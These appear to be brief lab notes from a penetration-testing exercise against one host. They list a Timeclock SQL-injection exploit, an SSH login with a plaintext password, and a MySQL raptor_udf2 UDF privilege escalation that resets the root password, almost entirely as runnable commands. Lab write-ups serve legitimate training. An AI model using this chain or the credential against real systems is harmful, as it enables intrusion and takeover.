commands,no screenshots
exemple
.252
timelock vulnerable to sqli -
https://www.exploit-db.com/exploits/39404
https://github.com/timip/exploit/blob/ma...meclock.py
python timelocksql.py 10.11.1.252 8000
ssh j0hn@10.11.1.252 -p 22000
pass: bzuisJDnuI6WUDl
privesc:
MySQL 4.x/5.0 (Linux) - User-Defined Function Dynamic Library
gcc -g -c raptor_udf2.c
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('echo "pass123" | passwd --stdin root');